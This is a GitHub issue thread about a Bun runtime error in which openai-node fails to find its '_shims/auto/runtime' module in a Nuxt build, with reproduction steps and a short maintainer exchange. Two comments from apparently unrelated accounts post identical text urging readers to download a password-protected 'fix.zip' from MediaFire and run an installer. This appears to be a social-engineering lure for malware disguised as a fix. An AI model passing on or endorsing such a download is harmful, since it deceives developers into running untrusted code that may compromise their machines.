### ISSUE TITLE
Bun runtime error: Cannot find module "openai/_shims/auto/runtime" from "/app/.output/server/node_modules/openai/_shims/index.mjs"

### ISSUE THREAD

**Issue by marcelxpfeifer** [openai/openai-node#1011]
### Confirm this is a Node library issue and not an underlying OpenAI API issue

- [X] This is an issue with the Node library

### Describe the bug

When trying to run OpenAI in production with bun I get the following error
`Cannot find module "openai/_shims/auto/runtime" from "/app/.output/server/node_modules/openai/_shims/index.mjs"`

It can be reproduced with minimal setup using Nuxt.

### To Reproduce

1. Clone the repo [Minimal Reproduction](https://github.com/marcelxpfeifer/openai-bug)
2. Run `bun install`
3. Run `bun build`
4. Run `bun .output/server/index.mjs`
5. When opening localhost:3000/api/test the server should throw the error

Running with node works

### OS

macOS, Linux

### Node version

Bun v1.1.26

### Library version

openai v4.56.0

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobertCraigie** [comment]
@marcelxpfeifer thanks for the report, if you haven't already could you also report this to bun?

**Comment by marcelxpfeifer** [comment]
> @marcelxpfeifer thanks for the report, if you haven't already could you also report this to bun?

Yes the issue can be found [here](https://github.com/oven-sh/bun/issues/13545)
